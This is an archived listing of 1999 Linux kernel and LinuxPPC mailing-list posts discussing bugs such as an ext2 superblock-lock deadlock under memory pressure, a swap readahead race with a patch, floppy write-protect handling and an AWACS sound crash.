@ 1999-01-08 23:47 64% ` Anton Blanchard
  0 siblings, 0 replies; 200+ results
From: Anton Blanchard @ 1999-01-08 23:47 UTC (permalink / raw)
  To: ultralinux


> i have a sun sparc station 2, with 64 mo ram, a seagate 4.5hd and when i want to quit the x-window interface, it crashes all the system. i try to recompilate the kernel, but it doesnt fix the bug.

Which version of the kernel are you using? The cgsix problem should be
fixed for recent (~2.1.130) kernels.

Anton

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
                                                           ` (3 preceding siblings ...)
  1999-01-08  2:56 54%                                         ` Eric W. Biederman
@ 1999-01-09  0:50 60%                                         ` David S. Miller
  1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
  5 siblings, 0 replies; 200+ results
From: David S. Miller @ 1999-01-09  0:50 UTC (permalink / raw)
  To: torvalds
  Cc: ebiederm+eric, andrea, steve, damonbrent, reese, kalle.andersson,
	Zlatko.Calusic, bmccann, alan, bredelin, sct, linux-kernel,
	H.H.vanRiel, linux-mm

   Date: 	Thu, 7 Jan 1999 09:56:03 -0800 (PST)
   From: Linus Torvalds <torvalds@transmeta.com>

   The positive news is that if I'm right in my suspicions it can only
   happen with shared writable mappings or shared memory segments. The
   bad news is that the bug appears rather old, and no immediate
   solution presents itself.

We could drop the superblock lock right before the actual bread()
call, grab it again right afterwards, then idicate back down to the
original caller that he should restart his search from the beginning
of the toplevel logic in ext2_free_blocks/ext2_new_block.

The second time around a bread() won't happen.

>From a performance standpoint, since we are doing a disk I/O anyways,
the extra software overhead here will be mute.

However, I am concerned about deadlocks in this scheme where the
bread() kicks some other bitmap block back out to disk, and we loop
forever pingponging block bitmap blocks back and forth with no forward
progress being made.  Also the logic in these functions is non-trivial
and making an "obviously correct" patch, ignoring the possible
deadlock mentioned here, might not be easy.

We've had a couple strange issues like this, with recursive superblock
lock problems, recall the quota writeback deadlock Bill Hawes fixed a
few months ago, very similar.

Later,
David S. Miller
davem@dm.cobaltmicro.com
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 60%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
                                                           ` (4 preceding siblings ...)
  1999-01-09  0:50 60%                                         ` David S. Miller
@ 1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
  1999-01-09  2:34 64%                                           ` Andrea Arcangeli
  1999-01-09 12:11 64%                                           ` Andrea Arcangeli
  5 siblings, 2 replies; 200+ results
From: Stephen C. Tweedie @ 1999-01-09  2:13 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Eric W. Biederman, Andrea Arcangeli, steve, brent verner,
	Garst R. Reese, Kalle Andersson, Zlatko Calusic, Ben McCann,
	Alan Cox, bredelin, Stephen C. Tweedie, linux-kernel,
	Rik van Riel, linux-mm

Hi,

On Thu, 7 Jan 1999 09:56:03 -0800 (PST), Linus Torvalds
<torvalds@transmeta.com> said:

> That way I can be reasonably hopeful that there are no new bugs introduced
> even though performance is very different. I _do_ have some early data
> that seems to say that this _has_ uncovered a very old deadlock condition: 
> something that could happen before but was almost impossible to trigger. 

> The deadlock I suspect is:
>  - we're low on memory
>  - we allocate or look up a new block on the filesystem. This involves
>    getting the ext2 superblock lock, and doing a "bread()" of the free
>    block bitmap block.
>  - this causes us to try to allocate a new buffer, and we are so low on
>    memory that we go into try_to_free_pages() to find some more memory.
>  - try_to_free_pages() finds a shared memory file to page out.
>  - trying to page that out, it looks up the buffers on the filesystem it
>    needs, but deadlocks on the superblock lock.

Hmm, I think that's a new one to me, but add to that one which I think
we've come across before and which I have not even thought about for a
couple of years at least: a large write() to a mmap()ed file can
deadlock for a similar reason, but on the inode write lock instead of
the superblock lock.

> The positive news is that if I'm right in my suspicions it can only happen
> with shared writable mappings or shared memory segments. The bad news is
> that the bug appears rather old, and no immediate solution presents
> itself. 

A couple solutions which come to mind: (1) make the superblock lock
recursive (ugh, horrible and it only works if we have an additional
mechanism to pin down bitmap buffers in the bitmap cache), or (2) allow
load_block_bitmap and friends to drop the superblock if it finds that it
needs to do an IO, and repeat if it happened.  However, what we're
basically saying here is that all operations on the superblock_lock have
to drop the lock if they want to allocate memory, and that's not a great
deal of fun: we might as well use the kernel spinlock.

It gets worse, because of course we cannot even rely on kswapd to
function correctly in this situation --- it will block on the superblock
lock just as happily as the current process's try_to_free_pages call
will.

I think the cleanest solution may be to reimplement some form of the old
GFP_IO flag, to prevent us from trying to use IO inside
try_to_free_pages() if we know we already have a lock which could
deadlock.  The easiest way I can see of achieving something like this is
to set current->flags |= PF_MEMALLOC while we hold the superblock lock,
or create another PF_NOIO flag which prevents try_to_free_pages from
doing anything with dirty pages.  I suspect that the PF_MEMALLOC option
might be good enough for starters; it will only do the wrong thing if we
have entirely exhausted the free page list.

The inode deadlock at least is relatively easy to fix, either by making
the inodelock recursive, or by having a separate sharable truncate lock
to prevent pages from being invalidated in the middle of the pageout
(which was the reason for the down() in the filemap write-page code in
the first place).  The truncate lock (or allocation/deallocation lock,
if you want to do it that way) makes a ton of sense; it avoids
serialising all writes while still making sure that truncates themselves
are exclusively locked.

>> 2) I have tested using PG_dirty from shrink_mmap and it is a
>> performance problem because it loses all locality of reference,
>> and because it forces shrink_mmap into a dual role, of freeing and
>> writing pages, which need seperate tuning.

> Exactly. This is part of the complexity.

> The right solution (I _think_) is to conceptually always mark it PG_dirty
> in vmscan, and basically leave all the nasty cases to the filemap physical
> page scan. But in the simple cases (ie a swap-cached page that is only
> mapped by one process and doesn't have any other users), you'd start the
> IO "early".

The trouble is that when we come to do the physical IO, we really want
to cluster the IOs.  Doing the swap cache allocation from vmscan means
that we'll still be allocating virtually adjacent memory pages to
adjacent swap pages, but if we don't do the IO itself until
shrink_mmap(), we'll lose the IO clustering which we need for good
swapout performance.

--Stephen
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 51%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
@ 1999-01-09  2:34 64%                                           ` Andrea Arcangeli
  1999-01-09  9:30 63%                                             ` Stephen C. Tweedie
  1999-01-09 12:11 64%                                           ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-09  2:34 UTC (permalink / raw)
  To: Stephen C. Tweedie
  Cc: Linus Torvalds, Eric W. Biederman, Zlatko Calusic, Alan Cox,
	bredelin, linux-kernel, Rik van Riel, linux-mm

Hi Stephen!

On Sat, 9 Jan 1999, Stephen C. Tweedie wrote:

> deadlock.  The easiest way I can see of achieving something like this is
> to set current->flags |= PF_MEMALLOC while we hold the superblock lock,

Hmm, we must not avoid shrink_mmap() to run. So I see plain wrong to set
the PF_MEMALLOC before call __get_free_pages(). Very cleaner to use
GFP_ATOMIC to achieve the same effect btw ;).

Now I am too tired to follow the other part of your email (I'll read
tomorrow, now it's time to sleep for me... ;).

Forget to tell, did you have comments about the FreeAfter() stuff? It made
sense to me (looking at page_io if I remeber well) but I have not
carefully reread it yet after Linus's comments on it. 

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-09  2:34 64%                                           ` Andrea Arcangeli
@ 1999-01-09  9:30 63%                                             ` Stephen C. Tweedie
  0 siblings, 0 replies; 200+ results
From: Stephen C. Tweedie @ 1999-01-09  9:30 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Stephen C. Tweedie, Linus Torvalds, Eric W. Biederman,
	Zlatko Calusic, Alan Cox, bredelin, linux-kernel, Rik van Riel,
	linux-mm

Hi,

On Sat, 9 Jan 1999 03:34:56 +0100 (CET), Andrea Arcangeli
<andrea@e-mind.com> said:

> Hi Stephen!
> On Sat, 9 Jan 1999, Stephen C. Tweedie wrote:

>> deadlock.  The easiest way I can see of achieving something like this is
>> to set current->flags |= PF_MEMALLOC while we hold the superblock lock,

> Hmm, we must not avoid shrink_mmap() to run. So I see plain wrong to set
> the PF_MEMALLOC before call __get_free_pages(). Very cleaner to use
> GFP_ATOMIC to achieve the same effect btw ;).

No, there are about a squillion possible places where we might try to
allocate memory with the superblock lock; updating them all to make
the gfp parameter conditional is gross!

Anyway, the whole point of PF_MEMALLOC is that it says we are
currently in the middle of an operation which has subtle deadlock or
stack overflow semantics wrt allocations, so always try to make
allocations from the free list.  In this case, the number of such
allocations we expect is small, so this is reasonable.  And yes, using
a new flag as opposed to PF_MEMALLOC would allow us to continue to
shrink_mmap (and in fact also to unmap clean pages) while preventing
recursive IO.

--Stephen
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 63%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
  1999-01-09  2:34 64%                                           ` Andrea Arcangeli
@ 1999-01-09 12:11 64%                                           ` Andrea Arcangeli
  1 sibling, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-09 12:11 UTC (permalink / raw)
  To: Stephen C. Tweedie
  Cc: Linus Torvalds, Eric W. Biederman, steve, brent verner,
	Garst R. Reese, Kalle Andersson, Zlatko Calusic, Ben McCann,
	Alan Cox, bredelin, linux-kernel, Rik van Riel, linux-mm

On Sat, 9 Jan 1999, Stephen C. Tweedie wrote:

> couple of years at least: a large write() to a mmap()ed file can
> deadlock for a similar reason, but on the inode write lock instead of
> the superblock lock.

Right. Look at the Oops report I generated at deadlock time and you'll see
that my kernel deadlocked in filemap_write_page() on the inode semaphore. 

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* [PATCH] Fix for swapin bug
@ 1999-01-13 17:43 59% Stephen C. Tweedie
  0 siblings, 0 replies; 200+ results
From: Stephen C. Tweedie @ 1999-01-13 17:43 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Stephen Tweedie, Alan Cox, linux-mm, linux-kernel, Bill Hawes

Hi,

In the swap readahead code, we correctly avoid trying to read in swap
pages which already have a swap count of zero.  However,
read_swap_page_async() can block between this point and the
swap_duplicate(); there is no guarantee that the page on disk is still
in use by the time we come to perform the swap IO, so swap_duplicate()
can fail with messages like

	morn kernel: swap_duplicate at    44400: entry 00044400, unused page 

The reason we don't see the same problem in normal swapping is simply
that the mm semaphore prevents multiple threads from trying to swap the
same page in concurrently, so we always guarantee that the current pte's
reference to the swap page is still valid after read_swap_page_async()
blocks. 

The fix is to perform the swap_duplicate at the very top of
read_swap_page_async(), before we have a chance to block.

--Stephen
----------------------------------------------------------------
--- mm/swap_state.c~	Tue Jan 12 17:04:49 1999
+++ mm/swap_state.c	Wed Jan 13 17:22:24 1999
@@ -283,7 +283,7 @@
 
 struct page * read_swap_cache_async(unsigned long entry, int wait)
 {
-	struct page *found_page, *new_page;
+	struct page *found_page = 0, *new_page;
 	unsigned long new_page_addr;
 	
 #ifdef DEBUG_SWAP
@@ -291,15 +291,20 @@
 	       entry, wait ? ", wait" : "");
 #endif
 	/*
+	 * Make sure the swap entry is still in use.
+	 */
+	if (!swap_duplicate(entry))	/* Account for the swap cache */
+		goto out;
+	/*
 	 * Look for the page in the swap cache.
 	 */
 	found_page = lookup_swap_cache(entry);
 	if (found_page)
-		goto out;
+		goto out_free_swap;
 
 	new_page_addr = __get_free_page(GFP_USER);
 	if (!new_page_addr)
-		goto out;	/* Out of memory */
+		goto out_free_swap;	/* Out of memory */
 	new_page = mem_map + MAP_NR(new_page_addr);
 
 	/*
@@ -308,11 +313,6 @@
 	found_page = lookup_swap_cache(entry);
 	if (found_page)
 		goto out_free_page;
-	/*
-	 * Make sure the swap entry is still in use.
-	 */
-	if (!swap_duplicate(entry))	/* Account for the swap cache */
-		goto out_free_page;
 	/* 
 	 * Add it to the swap cache and read its contents.
 	 */
@@ -330,6 +330,8 @@
 
 out_free_page:
 	__free_page(new_page);
+out_free_swap:
+	swap_free(entry);
 out:
 	return found_page;
 }

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 59%]

* Re: Pre-R5 installer, some bug fixes
@ 1999-01-13 19:42 64% Duncan Mak
  0 siblings, 0 replies; 200+ results
From: Duncan Mak @ 1999-01-13 19:42 UTC (permalink / raw)
  To: linuxppc-dev


> 3.  I couldn't get any of the rpms from biggi--I think the symlinks
confuse the installer.  I > ended up downloading the rpms to a local
computer and ftp installing from that computer.   > Without any symlinks
in the path, the installer found the rpms.

well, is it possible that someone at linuxppc.org put up ftp.linuxppc.org
or dev.linuxppc.org with one big directory of RPMS instead of a software
dir with RPMS in categories? i like the categories at all, but if that is
what making me not do ftp install, well... i want ftp install.

thanks,

duncan.


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Bug in macserial.c
@ 1999-01-14 22:41 64% Benjamin Herrenschmidt
  0 siblings, 0 replies; 200+ results
From: Benjamin Herrenschmidt @ 1999-01-14 22:41 UTC (permalink / raw)
  To: linuxppc-dev, Paul Mackerras


I found at least one bug in macserial.c : info->timeout is never filled
(should be from change_speed) and so the timeout used in wait_until_sent
is just garbage.

I'm fixing other things and looking for other bugs, I'll have a patch for
macserial.c available soon.


-- 
           E-Mail: <mailto:bh40@calva.net>
BenH.      Web   : <http://calvaweb.calvacom.fr/bh40/>





[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: floppy driver bug: write-protect
  1998-11-16  1:27 64% floppy driver bug: write-protect Brad Midgley
@ 1999-01-15  2:18 63% ` David A. Gatwood
  1999-01-15  3:30 64% ` Brad Midgley
  1999-01-15  3:31 64% ` Paul Mackerras
  2 siblings, 0 replies; 200+ results
From: David A. Gatwood @ 1999-01-15  2:18 UTC (permalink / raw)
  To: Brad Midgley; +Cc: linuxppc-dev


On Sun, 15 Nov 1998, Brad Midgley wrote:

> is this a known bug?
> 
> on intel linux, if you try to mount a write-protected floppy disk
> read-write, the mount succeeds but is demoted to read-only. 
> 
> the current pmac kernel will mount the disk read-write and will allow
> "writes" to the disk. the writes even appear to succeed and the mounted
> filesystem returns really strange results when you look at it (it's
> caching the "writes" and everything seems normal until uncached data has
> to be loaded from the disk!)
> 
> is it known how to query the drive for the write-protect status? does this
> problem affect any other removable media?

Wow, so you guys have that problem, too, eh?  MkLinux's floppy driver does
the same thing.  It's given me fits trying to find something in LinuxPPC
to demote it to read-only.  Guess that's why I didn't find anything!!!
:-)

If anybody figures out how to fix this (no doubt the same fix, roughly,
for both), please let me know.  I've gotten as far as forcing the device
read-only, but that flag is ignored by at least umsdos filesystem support,
not sure what else....  :-(


Later,
David

David A. Gatwood                         Visit globegate's internet
dgatwood@globegate.utm.edu                  talker, Deep Space 36
http://globegate.utm.edu                telnet globegate.utm.edu:9624

-----BEGIN GEEK CODE BLOCK-----
Version 3.1
GCS/CC/FA/H/L/MC/M/MU/PA/TW d-@ s:>- a-- C++ ++>$ UBLAS*++ ++>$
P+?>$ L++ +>$ !E--- W++ +>$ N++(++ +)>++ +$ !o? K-? !w--- !O
M++>$ !V-- PS+>$ !PE- Y+>$ PGP+>$ t++ +>$ 5+>++ ++$ !X- !R tv+>$
b++>$ !DI !D- G++(++ +)>$ e>++ ++ h--! r--- !y-
------END GEEK CODE BLOCK------


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 63%]

* Re: floppy driver bug: write-protect
  1998-11-16  1:27 64% floppy driver bug: write-protect Brad Midgley
  1999-01-15  2:18 63% ` David A. Gatwood
@ 1999-01-15  3:30 64% ` Brad Midgley
  1999-01-15  3:31 64% ` Paul Mackerras
  2 siblings, 0 replies; 200+ results
From: Brad Midgley @ 1999-01-15  3:30 UTC (permalink / raw)
  To: linuxppc-dev


This message was stuck in a mail queue since november!! (it was my own
sysadmin's fault :)

so when I say the current pmac kernel I really mean the pmac kernel of
November 15, 1998. 

argh, i just checked and this bug is present in vger-pre5.

brad

> 
> is this a known bug?
> 
> on intel linux, if you try to mount a write-protected floppy disk
> read-write, the mount succeeds but is demoted to read-only. 
> 
> the current pmac kernel will mount the disk read-write and will allow
> "writes" to the disk. the writes even appear to succeed and the mounted
> filesystem returns really strange results when you look at it (it's
> caching the "writes" and everything seems normal until uncached data has
> to be loaded from the disk!)
> 
> is it known how to query the drive for the write-protect status? does this
> problem affect any other removable media?
> 
> brad
> 
> 


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: floppy driver bug: write-protect
  1998-11-16  1:27 64% floppy driver bug: write-protect Brad Midgley
  1999-01-15  2:18 63% ` David A. Gatwood
  1999-01-15  3:30 64% ` Brad Midgley
@ 1999-01-15  3:31 64% ` Paul Mackerras
  1999-01-15 18:34 63%   ` David A. Gatwood
  2 siblings, 1 reply; 200+ results
From: Paul Mackerras @ 1999-01-15  3:31 UTC (permalink / raw)
  To: brad; +Cc: linuxppc-dev


Brad Midgley <brad@pht.com> wrote:

> is this a known bug?

well, I didn't know about it. :-)

> on intel linux, if you try to mount a write-protected floppy disk
> read-write, the mount succeeds but is demoted to read-only. 

Do you have access to an intel-linux box?  Could you do an strace on
the mount command on a write-protected floppy and see whether mount
does two mount system calls (the first failing with EROFS), or if it
does some other ioctl to check whether the disk is write-protected?

> the current pmac kernel will mount the disk read-write and will allow
> "writes" to the disk. the writes even appear to succeed and the mounted

OK, I need to check the write-protect status in the floppy_write
routine in swim3.c.

I have recently looked at the floppy driver source code in MkLinux,
which looks like it is derived from macos sources.  It looks like
there are a few tweaks which I need to do to the Linux/PPC driver.

Paul.

[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: floppy driver bug: write-protect
  1999-01-15  3:31 64% ` Paul Mackerras
@ 1999-01-15 18:34 63%   ` David A. Gatwood
  0 siblings, 0 replies; 200+ results
From: David A. Gatwood @ 1999-01-15 18:34 UTC (permalink / raw)
  To: Paul.Mackerras; +Cc: brad, linuxppc-dev


On Fri, 15 Jan 1999, Paul Mackerras wrote:

> OK, I need to check the write-protect status in the floppy_write
> routine in swim3.c.
> 
> I have recently looked at the floppy driver source code in MkLinux,
> which looks like it is derived from macos sources.  It looks like
> there are a few tweaks which I need to do to the Linux/PPC driver.

MkLinux's driver is based on a Copland driver with a Mach Driver
interwoven and some shim code.  Needs massive cleanup, but basically works
as long as you don't have more than one floppy drive.  Also a little
trouble with writing large chunks of data (not sure why).

Thanks for the info on how the write protect is supposed to work.  I put
some checks for write protect on write, but making the mount fail is a
much more logical solution.


Later,
David

David A. Gatwood                         Visit globegate's internet
dgatwood@globegate.utm.edu                  talker, Deep Space 36
http://globegate.utm.edu                telnet globegate.utm.edu:9624

-----BEGIN GEEK CODE BLOCK-----
Version 3.1
GCS/CC/FA/H/L/MC/M/MU/PA/TW d-@ s:>- a-- C++ ++>$ UBLAS*++ ++>$
P+?>$ L++ +>$ !E--- W++ +>$ N++(++ +)>++ +$ !o? K-? !w--- !O
M++>$ !V-- PS+>$ !PE- Y+>$ PGP+>$ t++ +>$ 5+>++ ++$ !X- !R tv+>$
b++>$ !DI !D- G++(++ +)>$ e>++ ++ h--! r--- !y-
------END GEEK CODE BLOCK------


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 63%]

* Re: BUG: deadlock in swap lockmap handling
  @ 1999-01-18 22:24 64% ` Alan Cox
  0 siblings, 0 replies; 200+ results
From: Alan Cox @ 1999-01-18 22:24 UTC (permalink / raw)
  To: andrea; +Cc: Zlatko.Calusic, sct, torvalds, linux-mm, linux-kernel

> I think it will not harm too much because the window is not too big (but
> not small) and because usually one of the process not yet deadlocked will
> generate IO and will wakeup also the deadlocked process at I/O
> completation time. A very lazy ;) but at the same time obviosly right

Take it from me - the scenario you give will cause deadlocks and problems.
There were other "generating an I/O would have cleaned up" type problems in
2.0.x < .35/6. They caused a lot of grief with installers where that 
I/O assumption is not true. Another classic case is large fsck's during
boot up.

So its not just a trivial irrelevant fix.

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Fwd: Inoffensive bug in mm/page_alloc.c
       [not found]     <990119214302.n0001113.ph@mail.clara.net>
@ 1999-01-27 23:55 59% ` Paul Hamshere
  1999-01-30  1:52 64%   ` Benjamin C.R. LaHaise
  0 siblings, 1 reply; 200+ results
From: Paul Hamshere @ 1999-01-27 23:55 UTC (permalink / raw)
  To: Linux-MM

Is this of any interest here?
Paul
------------------------------
Hi
I was trawling through the mm sources to try and understand how linux tracks the
use of pages of memory, how kmalloc and vmalloc work, and I think there is a bug
in the kernel (2.0) - it doesn't affect anything, only waste a tiny amount of
memory....does anyone else think it looks wrong?
The problem is in free_area_init where it allocates the bitmaps - I think they
are twice the size they need to be.
The dodgy line is

            bitmap_size = (end_mem - PAGE_OFFSET) >> (PAGE_SHIFT + i );

which I think should be 

            bitmap_size = (end_mem - PAGE_OFFSET) >> (PAGE_SHIFT + i + 1);

because the bitmap refers to adjacent pages.
I've changed my kernel to the second line and it seems to work.
Paul


----------------------------------------------------

unsigned long free_area_init(unsigned long start_mem, unsigned long end_mem)
{
      mem_map_t * p;
      unsigned long mask = PAGE_MASK;
      int i;

      /*
       * select nr of pages we try to keep free for important stuff
       * with a minimum of 48 pages. This is totally arbitrary
       */
      i = (end_mem - PAGE_OFFSET) >> (PAGE_SHIFT+7);
      if (i < 24)
            i = 24;
      i += 24;   /* The limit for buffer pages in __get_free_pages is
                * decreased by 12+(i>>3) */
      min_free_pages = i;
      free_pages_low = i + (i>>1);
      free_pages_high = i + i;
      start_mem = init_swap_cache(start_mem, end_mem);
      mem_map = (mem_map_t *) start_mem;
      p = mem_map + MAP_NR(end_mem);
      start_mem = LONG_ALIGN((unsigned long) p);
      memset(mem_map, 0, start_mem - (unsigned long) mem_map);
      do {
            --p;
            p->flags = (1 << PG_DMA) | (1 << PG_reserved);
            p->map_nr = p - mem_map;
      } while (p > mem_map);

      for (i = 0 ; i < NR_MEM_LISTS ; i++) {
            unsigned long bitmap_size;
            init_mem_queue(free_area+i);
            mask += mask;
            end_mem = (end_mem + ~mask) & mask;
/* commented out because not correct ?? PH
            bitmap_size = (end_mem - PAGE_OFFSET) >> (PAGE_SHIFT + i);
*/
            bitmap_size = (end_mem - PAGE_OFFSET) >> (PAGE_SHIFT + i +1);
            bitmap_size = (bitmap_size + 7) >> 3;
            bitmap_size = LONG_ALIGN(bitmap_size);
            free_area[i].map = (unsigned int *) start_mem;
            memset((void *) start_mem, 0, bitmap_size);
            start_mem += bitmap_size;
      }
      return start_mem;
}




--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 59%]

* AWACS Bug
@ 1999-01-28 14:01 64% Russell Hires
  1999-02-02  4:53 64% ` Paul Mackerras
  0 siblings, 1 reply; 200+ results
From: Russell Hires @ 1999-01-28 14:01 UTC (permalink / raw)
  To: linuxppc-dev


For some reason AWACS is causing Linux to crash. Here's the error
message I get: AWACS: error, status 4f40da9. I have a G3/266, which I
bought in late November 1998. 64 MB RAM, 6MB VRAM, DVD-ROM, 4 G SCSI HD
that runs Linux on 1.5 G partition (which is, of course, divided up into
/usr and so on...)  using the 2.2pre9 kernel (final).

About my crashes: it seems to happen when I use BootX the Application,
and not
BootX the Extension. Also, it happens when I try to backspace too much
at the prompt, or lately when I try to come out of X (using AfterStep)
back into the shell...I tried the user support list, and they suggested
that I ask the developers if they knew anything. So,
Do you know of what could be causing this, or how I should try to fix
it?

Russell Hires


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: AWACS Bug
@ 1999-01-28 19:03 62% Trevor Woerner
  0 siblings, 0 replies; 200+ results
From: Trevor Woerner @ 1999-01-28 19:03 UTC (permalink / raw)
  To: Russell Hires, LinuxPPC Developer, LinuxPPC Users


Hi Russell,

>it happens when I try to backspace too much
>at the prompt, or lately when I try to come out of X (using AfterStep)
>back into the shell...I tried the user support list, and they suggested
>that I ask the developers if they knew anything. So,
>Do you know of what could be causing this, or how I should try to fix
>it?

this is REALLY off the top of my head and just a suggestion. i have
no idea how the kernel works, or how the sound works, or how the kernel
interracts with the sound, so i have no clue how/if this'll work.

anyway, when you're in X why don't you try a:

    user# xset b off

(where "user#" is your prompt). i don't like a computer that beeps
and boops at me so i put this in my .xinitrc (or was it my .fvwm2rc?)
anyway, instead of beeping the console will flash (i.e. no beep)

xset takes a number of parameters (one of which is required to get the
mouse to track at a decent rate) to allow you to adjust a number of
things about your environment. on of the things you can change is the
bell setting. the command above turns the bell off.

give it a whirl, tell us what happens!

best regards,
    trevor woerner


------------------------------------------------------------

...and now, ladies and gentelmen, for your entertainment
   the band will play "Somewhere My Love Lies Sleeping"
   with a male chorus...

                             --- Groucho Marx


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 62%]

* Re: Fwd: Inoffensive bug in mm/page_alloc.c
  1999-01-27 23:55 59% ` Fwd: Inoffensive bug in mm/page_alloc.c Paul Hamshere
@ 1999-01-30  1:52 64%   ` Benjamin C.R. LaHaise
  0 siblings, 0 replies; 200+ results
From: Benjamin C.R. LaHaise @ 1999-01-30  1:52 UTC (permalink / raw)
  To: Paul Hamshere; +Cc: Linux-MM

Hello Paul,

> Is this of any interest here?

Yep!

> Paul
> ------------------------------
> Hi
> I was trawling through the mm sources to try and understand how linux tracks the
> use of pages of memory, how kmalloc and vmalloc work, and I think there is a bug
> in the kernel (2.0) - it doesn't affect anything, only waste a tiny amount of
> memory....does anyone else think it looks wrong?
> The problem is in free_area_init where it allocates the bitmaps - I think they
> are twice the size they need to be.

If you search the mailing list archives from either a year, maybe two ago,
someone brought forth the same concern, but Linus rejected the patch on
the basis that it wasn't trivially proven correct for *all* sizes of
memory.  The amount of memory involved is insignificant, and I'd speculate
that we'll see a page allocator in 2.3 at which point that loss can
disappear.

		-ben (cleaning out the inbox)

--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* bug in arch/ppc/mm/init.c
@ 1999-01-30 15:05 64% Loic Prylli
  1999-03-03  5:19 64% ` Paul Mackerras
  0 siblings, 1 reply; 200+ results
From: Loic Prylli @ 1999-01-30 15:05 UTC (permalink / raw)
  To: linuxppc-dev



Hello,

The init function of some drivers use ioremap, which may call
MMU_get_page (if the target zone cross a 4Mbyte/s bounday(. But
MMU_get_page is marked as an initfunc, so it is no longer
present->panic.


Here one possible solution:

--- arch/ppc/mm/init.c~ Thu Jan  7 21:06:57 1999
+++ arch/ppc/mm/init.c  Sat Jan 30 16:01:17 1999
@@ -883,7 +883,7 @@
        }           
 }
 
-__initfunc(static void *MMU_get_page(void))
+static void *MMU_get_page(void)
 {
